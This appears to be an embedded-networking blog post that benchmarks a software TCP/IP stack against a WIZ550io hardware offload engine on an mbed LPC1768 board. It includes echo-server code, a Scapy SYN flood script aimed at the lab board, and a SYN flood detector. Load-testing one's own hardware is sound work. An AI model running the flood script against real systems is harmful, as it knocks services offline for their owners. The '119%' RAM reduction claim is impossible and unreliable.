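Introduction

What is a DDoS attack?
DDoS attacks continue to rise
IoT devices can be used to support DDoS attacks
**What is a firewall for IoT?**
- We compare the traditional method and the proposed method under a DoS attack (SYN flood attack).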

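IoT platform: mbed NXP LPC1768

It is based on the NXP LPC1768, with a 32-bit ARM Cortex-M3 core running at 96MHz. It includes 512KB of flash, 32KB of RAM and many interfaces, including built-in Ethernet, USB host and device, CAN, SPI, I2C, ADC, DAC, PWM and other I/O interfaces. The pinout above shows the commonly used interfaces and their locations. Note that all the numbered pins (p5-p30) can also be used as DigitalIn and DigitalOut interfaces.

- Link 1: For more details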

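Traditional method: LwIP (TCP/IP software stack) + Ethernet MAC (LPC1768) + Ethernet PHY (DP83848J) @ mbed application board (Ethernet connection)

Feature list
* 128x32 graphics LCD
* 5-way joystick
* 2 x potentiometers
* 3.5mm audio jack (analog out)
* Speaker, PWM connected
* 3-axis +/- 1.5g accelerometer
* 3.5mm audio jack (analog in)
* 2 x servo motor headers
* RGB LED, PWM connected
* USB mini-B connector
* Temperature sensor
* Socket for XBee (Zigbee) or RN-XV (Wi-Fi)
* RJ45 Ethernet connector
* USB-A connector
* 1.3mm DC jack input

- Link 2: mbed application board on mbed.org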

Proposed method: WIZ550io (TOE + Ethernet MAC + Ethernet PHY)

- Link 3: WIZ550io component on mbed.org
- Link 4: W5500 component on mbed.org

Application: iperf

Recv-only code for the software stack

Modified from the mbed echo server.

```cpp
#include "mbed.h"
#include "EthernetInterface.h"

EthernetInterface eth;

int main()
{
    printf("Trying \r\n");
    // Change the IP address, netmask and gateway to match your environment.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");

    if (!ret) {
        printf("Initialized, MAC: %s\n\r", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %s\n\r",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %d\n\r", ret);
        return -1;
    }

    eth.connect();
    printf("IP Address is %s\n", eth.getIPAddress());

    // Listen on TCP port 5000.
    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("\nWait for new connection...\n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // Timeout after (1.5)s

        printf("Connection from: %s\n", client.get_address());

        // Receive only: the data is read and discarded, nothing is echoed back.
        char buffer[2048];
        while (true) {
            int n = client.receive(buffer, sizeof(buffer));

            if (n < 0) break; // !_is_connected
        }
        client.close();
    }
}
```

Recv-only code for the TOE

```cpp
#include <stdio.h>
#include <string.h>
#include "mbed.h"
#include "EthernetInterface.h"


//DigitalOut myled(LED1);
//Serial pc(USBTX , USBRX);
int main() {

    printf("Test - WIZ550io\r\n");

    // The SPI object must exist before its clock is configured.
    SPI spi(p5, p6, p7); // mosi, miso, sclk

    /** Set the spi bus clock frequency
     *
     *  @param hz SCLK frequency in hz (default = 1MHz)
     *  Maximum SPI data bit rate of 12.5 Mbit/s in LPC176X
    */
    spi.frequency(12500000);
    EthernetInterface eth(&spi, p8, p11); // spi, cs, reset

    // Change the IP address, netmask and gateway to match your environment.
    int ret = eth.init("192.168.77.34", "255.255.255.0", "192.168.77.1");
    if (!ret) {
        printf("Initialized, MAC: %s\n\r", eth.getMACAddress());
        printf("Connected, IP: %s, MASK: %s, GW: %s\n\r",
               eth.getIPAddress(), eth.getNetworkMask(), eth.getGateway());
    } else {
        printf("Error eth.init() - ret = %d\n\r", ret);
        return -1;
    }

    printf("IP Address is %s\n", eth.getIPAddress());

    // Listen on TCP port 5000.
    TCPSocketServer server;
    server.bind(5000);
    server.listen();

    while (true) {
        printf("\nWait for new connection...\n");
        TCPSocketConnection client;
        server.accept(client);
        client.set_blocking(false, 1500); // Timeout after (1.5)s

        printf("Connection from: %s\n", client.get_address());

        // Receive only: the data is read and discarded, nothing is echoed back.
        char buffer[2048];
        while (true) {
            int n = client.receive(buffer, sizeof(buffer));

            if (n < 0) break; // !_is_connected
        }
        client.close();
    }
}
```

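Code and memory size
Software stack vs. TOE (W5500) code

[Images: sw stack codes, TOE codes]

Memory usage

[Images: sw memory usage]

35.2kB (110%): The LPC1768 has 3 RAM banks: one general-purpose bank of 32kB, and two additional banks of 16kB each for Ethernet/USB/CAN purposes. Ethernet completely fills one of these additional banks. The online compiler includes this in the total RAM usage but assumes only 32kB is available, so the displayed percentage exceeds 100%; it will still work fine, though. (From mbed.org: developer.mbed.org)

**TOE reduces flash and RAM usage by 7% and 119%, respectively.**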

DoS attack (SYN flood attack)

We use Scapy (a Python library) for the DoS attack.

```python
from scapy.all import *

# Interval between packets, read as a number of seconds.
inter = float(input('inter(time in seconds to wait between 2packets) :'))

def synFlood(src, tgt, inter):
    IPlayer = IP(src=src, dst=tgt)
    TCPlayer = TCP(sport=3000, dport=3000) # as your env. change source and destination port
    pkt = IPlayer / TCPlayer
    send(pkt, loop=1, inter=inter) #

#send(pkts, inter=0, loop=0, verbose=None)
#  Send packets at layer 3, using the conf.L3socket supersocket. pkts can
#  be a packet, an implicit packet or a list of them.
#
#  loop: send the packets endlessly if not 0.
#  inter: time in seconds to wait between 2 packets
#  verbose: override the level of verbosity. Make the function totally silent when 0.
#   * Refer to http://www.secdev.org/projects/scapy/files/scapydoc.pdf for more detail.


# as your env. change to real IP address and so on.
src = "192.168.77.000" # PC IP address
tgt = "192.168.77.34"  # target board (LPC1768)

synFlood(src, tgt, inter)
```
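
A defender-side counterpart to the flood test above, added here as an example (it is not part of the original post): a sliding-window detector that flags a port receiving many SYNs while few handshakes complete. The record format, thresholds and sample addresses are assumptions; port 5000 matches the echo server shown earlier.

```python
from collections import deque

def detect_syn_flood(records, port, window_ms=1000, min_syns=50, max_ack_ratio=0.2):
    """Alert when many SYNs hit `port` within the window but few handshakes complete.

    records: (time_ms, src_ip, src_port, dst_port, flags) tuples sorted by time;
    flags "S" is a bare SYN, "A" is the ACK that completes a three-way handshake.
    Returns one (time_ms, syn_count, ack_count) tuple per flood onset.
    """
    syns, acks = deque(), deque()
    alerts, alerting = [], False
    for t, _src, _sport, dport, flags in records:
        if dport != port or flags not in ("S", "A"):
            continue
        (syns if flags == "S" else acks).append(t)
        for q in (syns, acks):              # drop events older than the window
            while q and q[0] <= t - window_ms:
                q.popleft()
        # SYN packets are counted, not distinct 4-tuples: a flood that reuses
        # one source port (as the test script above does) is a single 4-tuple.
        flooding = len(syns) >= min_syns and len(acks) <= max_ack_ratio * len(syns)
        if flooding and not alerting:
            alerts.append((t, len(syns), len(acks)))
        alerting = flooding
    return alerts

def sample_capture():
    """Constructed records: 20 normal clients, then bare SYNs every 10 ms."""
    recs = []
    for i in range(20):                     # one client per 100 ms, handshake completes
        recs.append((i * 100, "192.168.77.10", 40000 + i, 5000, "S"))
        recs.append((i * 100 + 5, "192.168.77.10", 40000 + i, 5000, "A"))
    for i in range(200):                    # constructed flood source, fixed port 3000
        recs.append((10000 + i * 10, "192.168.77.20", 3000, 5000, "S"))
    return recs

if __name__ == "__main__":
    for t, s, a in detect_syn_flood(sample_capture(), port=5000):
        print(f"t={t} ms: {s} SYNs, {a} completed handshakes in the last second")
```

The alert fires once at flood onset and re-arms only after the SYN rate or completion ratio returns to normal, so a sustained flood does not produce one alert per packet.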